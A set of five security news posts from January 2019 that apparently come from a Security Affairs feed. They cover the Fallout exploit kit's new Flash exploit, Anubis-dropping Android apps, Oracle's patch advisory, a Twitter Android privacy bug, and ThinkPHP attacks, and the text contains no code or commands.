Fallout Exploit Kit now includes exploit for CVE-2018-15982 Flash zero-day

Posted: 18 Jan 2019 03:22 PM PST

Experts at Malwarebytes have reported that the code for the recently discovered Flash zero-day flaw was added to the Fallout Exploit kit.

Experts at Malwarebytes observed a new version of the Fallout Exploit kit that include the code to exploit a recently discovered Flash zero-day vulnerability.

The Fallout Exploit kit was discovered at the end of August by the threat analyst nao_sec, at the time it was used to distribute the GandCrab ransomware and other malicious codes, including droppers and potentially unwanted programs (PUPs).

First detailed in September 2018, the toolkit was observed delivering malware families ranging from ransomware to backdoors, but also fingerprinting the browser profile to identify targets of interest.

The activity associated with the Fallout exploit kit was temporarily suspended in early January, likely to improve it, in the same period experts at Malwarebytes observed an increase in the RIG EK activity.

The Fallout EK was distributed mainly via malvertising chains, starting January 15 it was used to deliver the GandCrab ransomware.

“After a short hiatus in early January, the Fallout exploit kit is back in business again with some new features for the new year.” reads the post published by Malwarebytes.

“The revised Fallout EK boasts several new features, including integration of the most recent Flash Player exploit. Security researcher Kafeine identified that Fallout is now the second exploit kit to add CVE-2018-15982.”

One of the most important improvements for the Fallout Exploit kit is the exploit for a recently discovered Adobe Flash Player zero-day tracked as

The CVE-2018-15982 flaw is a critical use-after-free bug that was exploited by an advanced persistent threat actor in attacks aimed at a healthcare organization associated with the Russian presidential administration.

The flaw could be exploited by attackers to execute arbitrary code, Adobe addressed it with the release of Flash Player for Windows, macOS, Linux, and Chrome OS.

The first exploit kit that integrated the code to trigger the CVE-2018-15982 flaw in mid-December was Underminer.

The new Fallout Exploit kit implements the support for HTTPS support, a new landing page format, and uses Powershell to run the final payload.

Fallout Exploit kit

“The Base64 encoded Powershell command calls out the payload URL and loads it in its own way” continues the analysis. ”
“This technique is most likely an attempt at evasion, as traditionally we'd expect the Internet Explorer process to drop the payload.”

The new development for the Fallout Exploit kit demonstrates the malware developers continously monitor

This development is the proof that exploit kit developers are continuously improving their code to trigger the most recent flaws.

Pierluigi Paganini

(SecurityAffairs – Fallout Exploit kit, cybercrime)

The post Fallout Exploit Kit now includes exploit for CVE-2018-15982 Flash zero-day appeared first on Security Affairs.

Android apps use the motion sensor to evade detection and deliver Anubis malware

Posted: 18 Jan 2019 10:37 AM PST

Security experts from Trend Micro have recently spotted two Android apps that use the motion sensor to evade detection and spread the Anubis banking Trojan.

Malware authors continue to improve their malicious apps to avoid detection and infect the largest number of users.

Security experts from Trend Micro have recently spotted two Android apps in the Google Play Store, Currency Converter and BatterySaverMobi, that infected thousands of users with banking malware.

motion sensor data anubis

Currency Converter masquerade as a currency exchange app and
BatterySaverMobi as a battery saver app, both use motion-sensors of infected Android devices to evade detection. The inputs from the sensors are used before installing a banking Trojan dubbed Anubis.

With this trick, vxers attempt to avoid detection because the malicious code is able to detect the absence of the motion sensor in the emulators used by researchers to detect the malware.

“We looked into this campaign and found that the apps dropped a malicious payload that we can safely link to the known banking malware Anubis (detected by Trend Micro as ANDROIDOS_ANUBISDROPPER ).”
“These apps don't just use traditional evasion techniques; they also try to use the user and device's motions to hide their activities. ” reads the analysis published by Trend Micro.

“As a user moves, their device usually generates some amount of motion sensor data. The malware developer is assuming that the sandbox for scanning malware is an emulator with no motion sensors, and as such will not create that type of data. If that is the case, the developer can determine if the app is running in a sandbox environment by simply checking for sensor data.”

The infection process doesn’t start if the malware determines that the device and the user are still by analyzing the sensor data.

If the app discovers the sensor data it runs the malicious code and then attempts to trick the victims into downloading and installing the Anubis payload APK with a fake system update. masquerading it as a “stable version of Android.”

If the user accepts the bogus system update, the dropper uses requests and responses over legitimate services such as Twitter and Telegram downloads the Anubis banking Trojan from the C2 and install it.

“Then, it registers with the C&C server and checks for commands with an HTTP POST request. If the server responds to the app with an APK command and attaches the download URL, then the Anubis payload will be dropped in the background.” continues the analysis.

Experts pointed out the Anubis banking Trojan uses a built-in keylogger to steal credentials and it is also able to take screenshots of the users’ screen while inserting credentials into any banking app.

Experts observed infections in 93 different countries, the latest variant of the Anubis banking Trojan targets at least 377 variations of financial apps.

The banking Trojan is also able to access to contact lists and location, send spam messages to contacts, call numbers from the device, record audio, and alter external storage.

Further details on the malware, including IoCs are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Anubis banking Trojan, motion sensor)

The post Android apps use the motion sensor to evade detection and deliver Anubis malware appeared first on Security Affairs.

Oracle critical patch advisory addresses 284 flaws, 33 critical

Posted: 18 Jan 2019 05:15 AM PST

Oracle released the first critical patch advisory for 2019 that addresses a total of 284 vulnerabilities, 33 of them are rated "critical".

Let’s give a close look at some of the vulnerabilities fixed by this patch advisory.

The advisory fixed the CVE-2016-1000031 flaw, a remote code execution (RCE) bug in the Apache Commons FileUpload,  disclosed in November last year. The Commons FileUpload library is the default file upload mechanism in Struts 2, the CVE-2016-1000031 was discovered two years ago by experts at Tenable.

The bug affected the OCA’s Diameter Signalling Router component and its Communications Services Gatekeeper. The flaw also affected the Financial Services Analytical Applications Infrastructure, the Fusion Middleware MapViewer, and four three Oracle Retail components.

A vulnerability in the Apache Log4j tracked as CVE-2017-5645 impacted the Oracle’s Converged Application Server – Service Controller, the OCA Online Mediation Controller Service Broker, the WebRTC Session Controller, the FLEXCUBE component in Oracle Financial Services Applications, the Fusion’s GoldenGate app adapters and SOA Suite, and also a Sun tape library component.

The CVE-2017-5645 flaw resides in the Codehaus versions of Groovy and affected OCA Unified Inventory Management.

The critical patch advisory for 2019 also fixed the CVE-2018-11776 vulnerability in the OCA’s Communications Policy Management Component, this issue was exploited in 2018 by threat actors to mine cryptocurrency.

Oracle also addressed an arbitrary file upload flaw (CVE-2018-9206) in the OCA’s Services Gatekeeper that also impacted Primavera P6 in the Construction and Engineering Suite, and Siebel CRM.

Another bug fixed by Big Red affected the Oracle E-Business’ Performance Management component, it was in CVE-2019-2453:

“Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Performance Management.” reads the description provided by

“Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Performance Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Performance Management accessible data. “

Oracle addressed the CVE-2016-4000 flaw, Jython provided a vector for arbitrary code, it is used by Oracle Enterprise Manager platform, Banking Platform, and Utilities Network Management System.

The list is very long, it also includes patches for a DoS in the Derby
Apache tool used in the WebLogic server (CVE-2015-1832) and an RCE bug in the Spring framework used by Oracle Tuxedo and the Sun Tape Library ACSLS component.

People interested in the full list could visit the following address:


Pierluigi Paganini

(SecurityAffairs – hacking, critical patch advisory)

The post Oracle critical patch advisory addresses 284 flaws, 33 critical appeared first on Security Affairs.

Twitter fixed a bug in its Android App that exposed Protected Tweets

Posted: 18 Jan 2019 01:49 AM PST

A bug in the Twitter app for Android may have had exposed tweets, the social media platform revealed on Thursday.

The bug in the Android Twitter app affects the "Protect my Tweets" option from the account's "Privacy and safety" settings that allows viewing user’s posts only to approved followers.

People who used the Twitter app for Android may have had the protected tweets setting disabled after they made some changes to account settings, for example after a change to the email address associated with the profile.

“We’ve become aware of an issue in Twitter for Android that disabled the “Protect your Tweets” setting if certain account changes were made.” reads the security advisory published by the company.

“You may have been impacted by this issue if you had protected Tweets turned on in your settings, used Twitter for Android, and made certain changes to account settings such as changing the email address associated with your account between November 3, 2014, and January 14, 2019.”

The vulnerability was introduced on November 3, 2014, and was fixed on January 14, 2019, users using the iOS app or the web version were not impacted. 

Twitter has notified impacted users and has turned “Protect your Tweets” back on for them if it was disabled.

"We are providing this broader notice through the Twitter Help Center since we can't confirm every account that may have been impacted. We encourage you to review your privacy settings to ensure that your 'Protect your Tweets' setting reflects your preferences," continues the advisory.

Recently Twitter addressed a similar bug, in December the researcher Terence Eden discovered that the permissions dialog when authorizing certain apps to Twitter could expose direct messages to the third-party.

In September 2018, the company announced that an issue in Twitter Account Activity API had exposed some users' direct messages (DMs) and protected tweets to wrong developers.

Twitter is considered one of the most powerful social media platforms, it was used in multiple cases by nation-state actors as a vector for disinformation and propaganda.

In December Twitter discovered a possible nation-state attack while it was investigating an information disclosure flaw affecting its platform.

Pierluigi Paganini

(SecurityAffairs – Twitter app, Android)

The post Twitter fixed a bug in its Android App that exposed Protected Tweets appeared first on Security Affairs.

Attacks in the wild leverage flaw in ThinkPHP Framework

Posted: 17 Jan 2019 11:58 PM PST

Threat actors in the wild are leveraging a recently discovered flaw in the ThinkPHP PHP framework to install cryptominers, skimmers, and other malware.

Multiple threat actors are leveraging a recently discovered code execution vulnerability (CVE-2018-20062) in the ThinkPHP framework.

The flaw was already addressed by the Chinese firm TopThink that designed the framework, but security expert Larry Cashdollar at
Akamai’s Security Incident Response Team has now discovered active exploits of the flaw in the wild.

Cashdollar was investigating a recent Magecart campaign when discovered a new strain of malware.

“While investigating the recent Magecart card skimming attacks, I came across a payload I was not familiar with.  Further research into it lead me to discover that in December a researcher disclosed a remote command execution vulnerability in ThinkPHP, a web framework by TopThink.” reads the analysis published by the expert.

“The developers fixed the vulnerability stating that because “the framework does not detect the controller name enough, it may lead to possible ‘getshell‘ vulnerabilities without the forced routing enabled.”

Multiple attackers are using relatively simple techniques to trigger the issue, according to Cashdollar, they can leverage a single line of code to scan for the flaw.

Once discovered the flaw, the attackers could use publicly available code to exploit it and install several malicious codes.
Cashdollar said that in one case, threat actors exploited the flaw to deliver a varian of the Mirai bot.

“There are multiple actors abusing this flaw to install everything from a Mirai like botnet to Microsoft Windows malware. ” continues the post.

The analysis of sample from the last 7 days revealed that the majority of IP addresses are from the Asia Pacific region where the ThinkPHP framework is most popular.

ThinkPHP flaw

Cashdollar confirmed that threat actors are actively scanning systems across the world.

To secure your system update the framework to the current version.

“There is so much attack traffic, and so many ways to hide, criminals no longer worry about the tracks they’ve left behind. The goal now is to get command execution as any user, on any type of system, to either spread a botnet, distribute malware, or mine cryptocurrency.” concludes the expert.

“We will see more cross-pollination of command execution vulnerabilities in web apps, enterprise software, and IoT devices being used against multiple target platforms.”

Pierluigi Paganini

(SecurityAffairs – hacking, ThinkPHP)

The post Attacks in the wild leverage flaw in ThinkPHP Framework appeared first on Security Affairs.